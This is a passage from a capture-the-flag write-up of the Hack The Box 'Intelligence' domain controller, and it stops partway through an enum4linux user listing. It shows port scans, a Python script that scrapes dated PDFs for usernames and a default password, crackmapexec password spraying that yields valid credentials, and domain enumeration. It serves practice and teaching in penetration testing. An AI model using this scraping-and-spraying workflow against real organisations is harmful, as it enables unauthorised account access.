Intelligence
Completed on Aug 31, 2021

Overview
From the Active Directory machines HTB content developers have created, there is always something to learn. Intelligence gives you another approach on how an AD misconfiguration can lead to a domain compromise. In this case, unconstrained delegation is the path to owning AD; something that should definitely be avoided if possible, or at least tightly locked down. I hope this write-up provides some insight to others as it did for me while working on this machine.
Enumeration
Finding Open Ports
Just like we normally do, we will try to find out what services are exposed so we know how to proceed. In this box, we will expand the port scan to UDP ports as well.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ nmap -Pn -p- --min-rate=1000 -T4 intelligence.htb -oN int_openPorts.log -oX int_openPorts.xml
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-27 23:43 EDT
Nmap scan report for intelligence.htb (10.129.95.154)
Host is up (0.045s latency).
Not shown: 65515 filtered ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49693/tcp open unknown
49694/tcp open unknown
49704/tcp open unknown
49716/tcp open unknown
51742/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 94.07 seconds
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ sudo nmap -Pn -sU -p- --min-rate=1000 -T4 intelligence.htb
[sudo] password for jxberrios:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-27 23:49 EDT
Nmap scan report for intelligence.htb (10.129.95.154)
Host is up (0.045s latency).
Not shown: 65532 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
389/udp open ldap
Nmap done: 1 IP address (1 host up) scanned in 116.38 seconds
Let's run nmap default scripts and service versioning against the TCP ports found.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ PORTS=$(cat int_openPorts.log | grep tcp | cut -d "/" -f1 | xargs | tr " " ",")
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ nmap -sC -sV intelligence.htb -p $PORTS -oN int_PortScan.log -oX int_PortScan.xml
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-28 00:00 EDT
Nmap scan report for intelligence.htb (10.129.95.154)
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-08-28 10:58:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-28T10:59:47+00:00; +6h57m50s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-28T10:59:47+00:00; +6h57m50s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-28T10:59:47+00:00; +6h57m50s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-28T10:59:47+00:00; +6h57m50s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49694/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49704/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
51742/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h57m49s, deviation: 0s, median: 6h57m49s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-08-28T10:59:08
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.49 seconds
This machine has the typical open ports of a domain controller along with NTP and UDP LDAP, but let's go through the process anyway, inspect each service and look for low-hanging fruit.
From the certificate information in LDAP and LDAPS, we see dc.intelligence.htb. Let's add this to the hosts file.
Inspecting Web Application
After inspecting the site, we see that two PDF documents can be downloaded.


Let's download and inspect these documents:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ wget http://dc.intelligence.htb/documents/2020-01-01-upload.pdf
--2021-08-29 00:57:03-- http://dc.intelligence.htb/documents/2020-01-01-upload.pdf
Resolving dc.intelligence.htb (dc.intelligence.htb)... 10.129.30.68
Connecting to dc.intelligence.htb (dc.intelligence.htb)|10.129.30.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26835 (26K) [application/pdf]
Saving to: ‘2020-01-01-upload.pdf’
2020-01-01-upload.pd 100%[=====================>] 26.21K --.-KB/s in 0.04s
2021-08-29 00:57:03 (651 KB/s) - ‘2020-01-01-upload.pdf’ saved [26835/26835]
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ wget http://dc.intelligence.htb/documents/2020-12-15-upload.pdf
--2021-08-29 00:57:15-- http://dc.intelligence.htb/documents/2020-12-15-upload.pdf
Resolving dc.intelligence.htb (dc.intelligence.htb)... 10.129.30.68
Connecting to dc.intelligence.htb (dc.intelligence.htb)|10.129.30.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27242 (27K) [application/pdf]
Saving to: ‘2020-12-15-upload.pdf’
2020-12-15-upload.pd 100%[=====================>] 26.60K --.-KB/s in 0.04s
2021-08-29 00:57:15 (683 KB/s) - ‘2020-12-15-upload.pdf’ saved [27242/27242]
Inspecting PDF Files
Using exiftool to inspect the PDF files:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ exiftool 2020-01-01-upload.pdf
ExifTool Version Number : 12.16
File Name : 2020-01-01-upload.pdf
Directory : .
File Size : 26 KiB
File Modification Date/Time : 2021:04:01 13:00:00-04:00
File Access Date/Time : 2021:08:29 00:57:03-04:00
File Inode Change Date/Time : 2021:08:29 00:57:03-04:00
File Permissions : rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : William.Lee
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ exiftool 2020-12-15-upload.pdf
ExifTool Version Number : 12.16
File Name : 2020-12-15-upload.pdf
Directory : .
File Size : 27 KiB
File Modification Date/Time : 2021:04:01 13:00:00-04:00
File Access Date/Time : 2021:08:29 00:57:15-04:00
File Inode Change Date/Time : 2021:08:29 00:57:15-04:00
File Permissions : rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : Jose.Williams
From the metadata of these files, we now have a naming convention for user accounts, so let's create a user list including other possible combinations:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ cat << EOF >> users.txt
heredoc> William.Lee
heredoc> Jose.Williams
heredoc> administrator
heredoc> wlee
heredoc> jwilliams
heredoc> Guest
heredoc> EOF
User Enumeration with Kerbrute
Using Kerbrute for user enumeration can help determine which of these are valid and rule out the guesses that are not:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ kerbrute userenum --dc dc.intelligence.htb -d intelligence.htb users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/29/21 - Ronnie Flathers @ropnop
2021/08/29 01:42:53 > Using KDC(s):
2021/08/29 01:42:53 > dc.intelligence.htb:88
2021/08/29 01:42:53 > [+] VALID USERNAME: William.Lee@intelligence.htb
2021/08/29 01:42:53 > [+] VALID USERNAME: Jose.Williams@intelligence.htb
2021/08/29 01:42:53 > [+] VALID USERNAME: administrator@intelligence.htb
2021/08/29 01:42:53 > Done! Tested 6 usernames (3 valid) in 0.048 seconds
Custom Scripting for PDF Content Extraction
To find out whether there are more PDF files, and to extract their information, we need to test each candidate download URL and pull the metadata. For this, we wrote a script that handles the requests, builds a user list from the Creator metadata of every PDF found, and writes the content of any PDF that mentions the keyword to a file:
#!/usr/bin/env python3
import os
import requests
from pdfminer.high_level import extract_text
from pdfminer.pdfparser import PDFParser
from pdfminer.pdfdocument import PDFDocument


def main():
    URL = 'http://intelligence.htb/documents/'
    KEYWORD = 'user'
    os.makedirs("./pdf", exist_ok=True)
    for year in range(2020, 2022):
        for month in range(1, 13):
            for day in range(1, 32):
                # File names follow the YYYY-MM-DD-upload.pdf pattern seen on the site.
                # Impossible dates (e.g. 02-30) simply return 404 and are skipped.
                pdf_file = "{0}-{1:02}-{2:02}-upload.pdf".format(year, month, day)
                req = requests.get(URL + pdf_file, timeout=10)
                path = "./pdf/{}".format(pdf_file)
                if req.status_code == 200:
                    print("File: " + pdf_file)
                    with open(path, 'wb') as pdffile:
                        pdffile.write(req.content)
                    # Extracting PDF File Metadata (the Creator field holds the username)
                    with open(path, 'rb') as pdffile:
                        doc = PDFDocument(PDFParser(pdffile))
                        info = doc.info[0] if doc.info else {}
                        creator = info.get("Creator", b"")
                        if isinstance(creator, bytes):
                            creator = creator.decode(errors="replace")
                        else:
                            creator = str(creator)
                    print("PDF Creator: " + creator)
                    # Creating User List from PDF Metadata
                    with open("./user_list.txt", 'a') as user:
                        user.write(creator + "\n")
                    # Extracting PDF Content and keeping anything that mentions the keyword
                    data = extract_text(path)
                    if KEYWORD in data:
                        print("Content: " + data)
                        with open("./valid_data.txt", 'a') as valid:
                            valid.write("File: {}\n\n".format(pdf_file))
                            valid.write("PDF Creator: {}\n\n".format(creator))
                            valid.write("Content: {}\n\n".format(data))
                    print("\n")
                    os.remove(path)
    os.rmdir("./pdf")


if __name__ == "__main__":
    main()
After running this script, we obtained a default password from the content of one PDF, along with a username from its metadata:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ cat valid_data.txt
File: 2020-06-04-upload.pdf
PDF Creator: Jason.Patterson
Content: New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
The obvious next step is to test this password and attempt to use it with the PDF creator username.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ smbclient -L intelligence.htb -W "ingelligence.htb" -U "Jason.Patterson%NewIntelligenceCorpUser9876"
session setup failed: NT_STATUS_LOGON_FAILURE
Password Spraying
Testing this credential set did not work, but given the message in the PDF, spraying the default password across the users collected from the PDF metadata could lead us to a valid credential pair.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ crackmapexec smb dc.intelligence.htb -d intelligence.htb -u user_list.txt -p NewIntelligenceCorpUser9876 --continue-on-success
SMB intelligence.htb 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB intelligence.htb 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
SMB intelligence.htb 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Thomas.Hall:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB intelligence.htb 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
This confirms which user the password works for. The credential set is:
User: Tiffany.Molina
Password: NewIntelligenceCorpUser9876
SMB and LDAP Enumeration with Enum4Linux
The header of this section doesn't do justice to what enum4linux does, since it covers more than SMB and LDAP, but let's expand our enumeration to other services:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ enum4linux -w 'intelligence.htb' -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -U -G -S -o intelligence.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Aug 29 21:11:26 2021
=========================================( Target Information )=========================================
Target ........... intelligence.htb
RID Range ........ 500-550,1000-1050
Username ......... 'Tiffany.Molina'
Password ......... 'NewIntelligenceCorpUser9876'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================( Enumerating Workgroup/Domain on intelligence.htb )==========================
[+] Got domain/workgroup name: intelligence.htb
=================================( Session Check on intelligence.htb )=================================
[+] Server intelligence.htb allows sessions using username 'Tiffany.Molina', password 'NewIntelligenceCorpUser9876'
==============================( Getting domain SID for intelligence.htb )==============================
Domain Name: intelligence
Domain Sid: S-1-5-21-4210132550-3389855604-3437519686
[+] Host is part of a domain (not a workgroup)
=================================( OS information on intelligence.htb )=================================
[E] Can't get OS info with smbclient
[+] Got OS info for intelligence.htb from srvinfo:
INTELLIGENCE.HTWk Sv PDC Tim NT
platform_id : 500
os version : 10.0
server type : 0x80102b
=====================================( Users on intelligence.htb )=====================================
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xf86 RID: 0x46b acb: 0x00000210 Account: Anita.Roberts Name: (null) Desc: (null)
index: 0xf7c RID: 0x461 acb: 0x00000210 Account: Brian.Baker Name: (null) Desc: (null)
index: 0xf87 RID: 0x46c acb: 0x00000210 Account: Brian.Morris Name: (null) Desc: (null)
index: 0xf88 RID: 0x46d acb: 0x00000210 Account: Daniel.Shelton Name: (null) Desc: (null)
index: 0xf6a RID: 0x44f acb: 0x00000210 Account: Danny.Matthews Name: (null) Desc: (null)
index: 0xf80 RID: 0x465 acb: 0x00000210 Account: Darryl.Harris Name: (null) Desc: (null)
index: 0xf6e RID: 0x453 acb: 0x00000210 Account: David.Mcbride Name: (null) Desc: (null)
index: 0xf70 RID: 0x455 acb: 0x00000210 Account: David.Reed Name: (null) Desc: (null)
index: 0xf7f RID: 0x464 acb: 0x00000210 Account: David.Wilson Name: (null) Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xf71 RID: 0x456 acb: 0x00000210 Account: Ian.Duncan Name: (null) Desc: (null)
index: 0xf8b RID: 0x470 acb: 0x00000210 Account: James.Curbow Name: (null) Desc: (null)
index: 0xf8d RID: 0x472 acb: 0x00000210 Account: Jason.Patterson Name: (null) Desc: (null)
index: 0xf6c RID: 0x451 acb: 0x00000210 Account: Jason.Wright Name: (null) Desc: (null)
index: 0xf85 RID: 0x46a acb: 0x00000210 Account: Jean.Walter Name: (null) Desc: (null)
index: 0xf73 RID: 0x458 acb: 0x00000210 Account: Jennifer.Thomas Name: (null) Desc: (null)
index: 0xf8c RID: 0x471 acb: 0x00000210 Account: Jeremy.Mora Name: (null) Desc: (null)
index: 0xf89 RID: 0x46e acb: 0x00000210 Account: Jessica.Moody Name: (null) Desc: (null)
index: 0xf84 RID: 0x469 acb: 0x00000210 Account: Joel.Crawford Name: (null) Desc: (null)
index: 0xf79 RID: 0x45e acb: 0x00000210 Account: John.Coleman Name: (null) Desc: (null)
index: 0xf6b RID: 0x450 acb: 0x00000210 Account: Jose.Williams Name: (null) Desc: (null)
index: 0xf74 RID: 0x459 acb: 0x00000210 Account: Kaitlyn.Zimmerman Name: (null) Desc: (null)
index: 0xf76 RID: 0x45b acb: 0x00000210 Account: Kelly.Long Name: (null) Desc: (null)
index: 0xf10 RID: 0x1f6 acb: 0x00000211 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xf8e RID: 0x473 acb: 0x00000210 Account: Laura.Lee Name: (null) Desc: (null)
